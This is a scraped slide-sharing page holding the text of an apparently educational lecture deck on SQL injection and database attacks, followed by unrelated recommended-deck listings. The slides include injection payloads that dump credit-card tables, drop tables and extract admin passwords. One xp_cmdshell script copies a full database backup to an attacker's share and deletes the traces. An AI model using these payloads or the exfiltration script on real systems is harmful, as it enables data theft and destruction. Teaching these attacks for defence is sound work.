sql hacking
play

SQL Hacking I NTRODUCTION Data theft is becoming a major threat. - PDF document

Nov 15, 2022 •204 likes •297 views

SQL Hacking I NTRODUCTION Data theft is becoming a major threat. Criminals have identified where the gold is. In the last year many databases from fortune 500 companies were compromised. Database vulnerabilities affect all database

  1. SQL Hacking I NTRODUCTION  Data theft is becoming a major threat.  Criminals have identified where the gold is.  In the last year many databases from fortune 500 companies were compromised.  Database vulnerabilities affect all database vendors 2 I NTRODUCTION  Perimeter defense is not enough  Databases have many entry points  Web applications  Internal networks  Partners networks  Etc.  If the OSs and the networks are properly secured, databases still could be:  Misconfigured.  Have weak passwords.  Vulnerable to known/unknown vulnerabilities. 3 3 3 3

  2. I NTRODUCTION  CardSystems, credit card payment processing  Ruined by SQL Injection attack in June 2005  263,000 credit card #s stolen from its DB  #s stored unencrypted, 40 million exposed  Awareness Increasing: # of reported SQL injection vulnerabilities tripled from 2004 to 2005 4 H ACKING S TRATEGIES  Password guessing/bruteforcing  If passwords are blank or not strong they can be easily guessed/brute forced.  After a valid user account is found is easy to completely compromise the database  Passwords and data sniffed over the network  If encryption is not used, passwords and data can be sniffed.  Exploiting misconfigurations  Some database servers are open by default  Lots of functionality enabled and sometimes insecurely configured. 5 S AMPLE SCRIPT TO COPY E NTIRE DB  Stealing a complete database from Internet.  Backup the database  BACKUP DATABASE databasename TO DISK ='c:\windows\temp\out.dat'  Compress the file (you don't want a 2gb file)  EXEC xp_cmdshell 'makecab c:\windows\temp\out.dat c:\windows\temp\out. cab'  Get the backup by copying it to your computer.  EXEC xp_cmdshell 'copy c:\windows\temp\out.cab\ \yourIP\share'  Or by any other way (tftp, ftp, http, email, etc.)  Erase the files  EXEC xp_cmdshell 'del c:\windows\temp\out.dat c:\windows\temp\out. cab‘ 6 6 6 6

  3. A TTACK S CENARIO E XAMPLE  Ex: Pizza Site Reviewing Orders  Form requesting month # to view orders for  HTTP request: https://www.deliver-me-pizza.com/show_orders?month=10 7 A TTACK S CENARIO E XAMPLE  App constructs SQL query from parameter: sql_query = "SELECT pizza, toppings, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " " + "AND order_month=" + request.getParamenter("month") ; Normal SELECT pizza, toppings, quantity, order_day SQL FROM orders WHERE userid=4123 Query AND order_month=10 8 A TTACK S CENARIO E XAMPLE  More damaging attack: attacker sets month=0 AND 1=0 UNION SELECT cardholder, number, exp_month, exp_year What does this do? FROM creditcards 9 9 9 9

  4. A TTACK S CENARIO E XAMPLE  Even worse, attacker sets 0; DROP TABLE creditcards;  Then DB executes SELECT pizza, toppings, quantity,  Type 2 Attack: Removes creditcards order_day from schema! FROM orders WHERE userid=4123  Future orders fail! AND order_month=0; DROP TABLE  Problematic Statements: creditcards;  Modifiers: INSERT INTO admin_users VALUES ('hacker',...)  Administrative: shut down DB, control OS… 10 10 10 10 A TTACK S CENARIO E XAMPLE  Injecting String Parameters: Topping Search sql_query = "SELECT pizza, toppings, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " " + "AND topping LIKE '%" + request.getParamenter("topping") + "%' "; 11 11 11 11 Source :http://xkcd.com/327/ 12 12 12 12

  5. SQL I NJECTION #2  Enter into input-field:  1%20and%201=convert(int,(select%20top%201%20cha r(97)%2bpassword%20from%20adminusers))  Translates to:  1 and 1=convert(int,(select top 1 char(97) password from adminusers))  What does this do? 13 13 13 13 W HERE TO START ? 14 14 14 14 J AVASCRIPT I NJECTION Ideas? Images from: http://www.asp.net/mvc/tutorials/preventing-javascript-injection-attacks-cs  15 15 15 15

  6. J AVASCRIPT I NJECTION  Looks like a prank  Unfortunately, a hacker can do some really, really evil things by injecting JavaScript into a website  You can use a JavaScript injection attack to perform a Cross-Site Scripting (XSS) attack  steal confidential user information and send the information to another website  the values of browser cookies from other users  Cookies can store passwords, credit card numbers, or social security numbers 16 16 16 16 F INDING SQL S ERVERS  Tool to scan and find SQL Servers: 17 17 17 17 P ROBING SQL S ERVERS  Probe the SQL Server for vulnerabilities This program tells the hacker how to connectto the database and what • methods may or may not work In addition, it provides the SQL server's name, which can be handy • when guessing passwordsand determining the purpose of the server 18 18 18 18

  7. E XPLOIT THE SQL S ERVER  Use a program such as SQLDict or SQLCracker (also included with the SQLTools suite)  can quickly and systematically take a dictionary file and test the strength of a SQL server  use found username and password to connect to a database server and take ownership of that data  Access possibilities  download, update, and delete data  A database account can also give a hacker full access to the file system on a server, or even to the files on the network to which it is connected? 19 19 19 19 H OW ?  One popular method is to use the xp_cmdshell  stored procedure included with MS SQL Server  Is a portal to the cmd.exe file on the server  Can be used for nefarious forms  using TFTP to download ncx99.exe (a popular remote shell Trojan)  copying the server's SAM user account file to the Web server root folder  can be downloaded anonymously and then cracked  the database on the server is only one of many possible items that can be compromised by a direct SQL attack!! 20 20 20 20 U NU – R OMANIAN ( WHITEHAT ) H ACKER  Feb 2009  found a vulnerability in the web site of Finish AV vendor F-Secure  Feb 2009  injection vulnerability in US web site of Kasperski, an anti-virus software vendor, exposing the full database  Feb 2009  Hacks Polish distributor of BitDefender, another anti- virus software vendor  May 2009  an Orange France web site dedicated to photo management is vulnerable to SQL injection and that he was able to access 245,000 records from the web site 21 21 21 21

  8. R EFERENCES  Cesar Cerrudo: “ Hacking databases for owning your data ”. Argeniss – Information Security  Slides adapted from "Foundations of Security: What Every Programmer Needs To Know" by Neil Daswani, Christoph Kern, and Anita Kesavan (ISBN 1590597842; http://www.foundationsofsecurity.com). Chapter 8  http://www.airscanner.com/pubs/sql.pdf 22 22 22 22  SQL Server Demo 23 23 23 23

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical? Legality VS Ethics State Sanctioned hacking BLACK HAT - Stereotypical Hacker -Stealing data for personal gain -Obviously not ethical -Using

1.17k views • 10 slides
Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking AI-Corp Hacking RL 1. Information gathering 2. Scanning 3. Exploitation & privilege escalation 4. Maintaining access & covering tracks

960 views • 62 slides
Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1 Disclaimer Everything you are about to see, hear, read and experience is for educational purposes only. No warranties or guarantees implied or

692 views • 47 slides
Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June 15, 2017 Outline Drone Architectures RF Basics Information Gathering RF Hacking Tools Exploits & Demos Q&A Why? Wrights Law

485 views • 27 slides
Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by benign purposes Hacktivism Counterhacking Case Studies Site defacement Network exploration / Port scanning / SQL injection / . . .

522 views • 18 slides
Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in)

Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in)

ECF gratefully acknowledges financial support from the European Commission. Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in) the city of Copenhagen using bicycles. Bicycle-as-a-Sensor 1.

278 views • 11 slides
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers Objectives After reading this chapter and completing the exercises, you will be able to: Describe Web applications Explain Web application

530 views • 9 slides
Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat

Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat

Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat 2011 Las Vegas, NV Presen sented ed b by: Francis Brown Rob Ragan Stach & Liu, LLC www.stachliu.com Agenda O V E R V I E W

1.07k views • 72 slides
ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING

ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING

ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING TOOLKIT FREE, OPEN-SOURCE WHAT IS ZIGDIGGITY??? + = RaspBee radio + Raspberry Pi ZigDiggity - GitHub Code http://zigdiggity.com BISHOPFOX

617 views • 23 slides
Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020

Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020

Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020 HACKING C# - ADAM FURMANEK About me Experienced with backend, frontend, mobile, desktop, ML, databases. Blogger, public speaker. Author of .NET

481 views • 37 slides
Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi From Myself Associate Professor at UiO Teaching Ethical Hacking since 2012 Lecturer of the IN5290 Ethical Hacking at UiO Leader

878 views • 66 slides
Innovation through the www.linkedin.com/pulse/climate-change-healthcare-lucien- hacking

Innovation through the www.linkedin.com/pulse/climate-change-healthcare-lucien- hacking

CLIMATE CHANGE IN HELTHCARE : Driving Innovation through the www.linkedin.com/pulse/climate-change-healthcare-lucien- hacking engelen GIB DE MEDEIROS, PH.D. Digital Hospital Transformation Forum at HIC 2017 Brisbane, Australia HACKING

644 views • 27 slides
Hacking Telco equipment The HLR/HSS Laurent Ghigonis Security researcher at P1 Security Hacking

Hacking Telco equipment The HLR/HSS Laurent Ghigonis Security researcher at P1 Security Hacking

Hacking Telco equipment The HLR/HSS Laurent Ghigonis Security researcher at P1 Security Hacking Telco equipment: The HLR/HSS Laurent Ghigonis P1 Security 2014, Hackito Ergo Sum - Security Conference What are we talking about ? A mobile

724 views • 59 slides
Hacking in Popular Culture Week 2 Frank Chen | Spring 2017 Agenda Administrative Review

Hacking in Popular Culture Week 2 Frank Chen | Spring 2017 Agenda Administrative Review

Mr. Robot, an Emmy Award-winning TV drama starring a vigilante hacker CS 88S Hacking in Popular Culture Week 2 Frank Chen | Spring 2017 Agenda Administrative Review last weeks material Hack Hollywood Hacking: The Good, The

718 views • 45 slides
Hacking Russia: Inside an Hacking Russia: Inside an unprecedented prosecution of organized

Hacking Russia: Inside an Hacking Russia: Inside an unprecedented prosecution of organized

Hacking Russia: Inside an Hacking Russia: Inside an unprecedented prosecution of organized cybercrime Joseph Menn Agenda Agenda Why Russia matters (and differs from China) Why Russia matters (and differs from China) How three hackers got

557 views • 12 slides
Google Hacking against Privacy Emin Islam Tatl tatli@th.informatik.uni-mannheim.de

Google Hacking against Privacy Emin Islam Tatl tatli@th.informatik.uni-mannheim.de

Outline Google Hacking Privacy Searches Countermeasures Future Work Conclusion Google Hacking against Privacy Emin Islam Tatl tatli@th.informatik.uni-mannheim.de Department of Computer Science, University of Mannheim (on leave to the

389 views • 21 slides
CS-527 Software Security Web security Asst. Prof. Mathias Payer Department of Computer Science

CS-527 Software Security Web security Asst. Prof. Mathias Payer Department of Computer Science

CS-527 Software Security Web security Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017 Command injection Table of Contents Command

705 views • 23 slides
Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of

Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of

ITS335 DoS Attacks DoS Attacks Classic DoS Flooding & DDoS Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 August 2013

409 views • 26 slides
Highly Secure and Efficient Routing Arvind Krishnamurthy Ioannis Avramopoulos, Hisashi Kobayashi

Highly Secure and Efficient Routing Arvind Krishnamurthy Ioannis Avramopoulos, Hisashi Kobayashi

Highly Secure and Efficient Routing Arvind Krishnamurthy Ioannis Avramopoulos, Hisashi Kobayashi Randolph Wang Dept. of Computer Science Dept. of Electrical Engineering Dept. of Computer Science School of Engineering and Applied Science Yale

307 views • 12 slides
Steps Towards a DoS-resistant Internet Architecture Mark Handley Adam Greenhalgh University

Steps Towards a DoS-resistant Internet Architecture Mark Handley Adam Greenhalgh University

Steps Towards a DoS-resistant Internet Architecture Mark Handley Adam Greenhalgh University College London Denial-of-Service Attacker attempts to prevent the victim from doing any useful work. Flooding Attacks Exploiting Software

806 views • 27 slides
Detecting Service Violation in Internet and Mobile Ad Hoc Networks Bharat Bhargava CERIAS

Detecting Service Violation in Internet and Mobile Ad Hoc Networks Bharat Bhargava CERIAS

Detecting Service Violation in Internet and Mobile Ad Hoc Networks Bharat Bhargava CERIAS Security Center CWSA Wireless Center Department of CS and ECE Purdue University bb@cs.purdue.edu Supported by NSF IIS 0209059, NSF IIS 0242840 , NSF

1k views • 97 slides
The Skinny Family of Tweakable Block Ciphers Thomas Peyrin NTU - Singapore ASK 2016 Nagoya,

The Skinny Family of Tweakable Block Ciphers Thomas Peyrin NTU - Singapore ASK 2016 Nagoya,

The Skinny Family of Tweakable Block Ciphers Thomas Peyrin NTU - Singapore ASK 2016 Nagoya, Japan - September 30, 2016 The STK construction Skinny SKINNY security SKINNY performances Future works SKINNY website C. Beierle, J. Jean, S.

1.91k views • 55 slides
Opioid Action Plan 2.0: NCIOM Workgroup on ACEs and January 22, 2019 NCDHHS, Division of Public

Opioid Action Plan 2.0: NCIOM Workgroup on ACEs and January 22, 2019 NCDHHS, Division of Public

NC Department of Health and Human Services Division of Public Health Opioid Action Plan 2.0: NCIOM Workgroup on ACEs and January 22, 2019 NCDHHS, Division of Public Health | OPDAAC Coordinating Meeting | November 8, 2018 1 Introduction

236 views • 20 slides
1 GUESS WHOS COMING TO DINNER LUKE 14:1-24 AN INVITATION TO A FINE DINNER 1. FIRST, THE TABLE

1 GUESS WHOS COMING TO DINNER LUKE 14:1-24 AN INVITATION TO A FINE DINNER 1. FIRST, THE TABLE

1 GUESS WHOS COMING TO DINNER LUKE 14:1-24 AN INVITATION TO A FINE DINNER 1. FIRST, THE TABLE IS SPREAD by the religious lawyers! They watched him. v. 1 2. THEN THEIR TRAP WAS SPRUNG. v. 2-4 The trap was twofold: a. Could Jesus

287 views • 9 slides

More recommend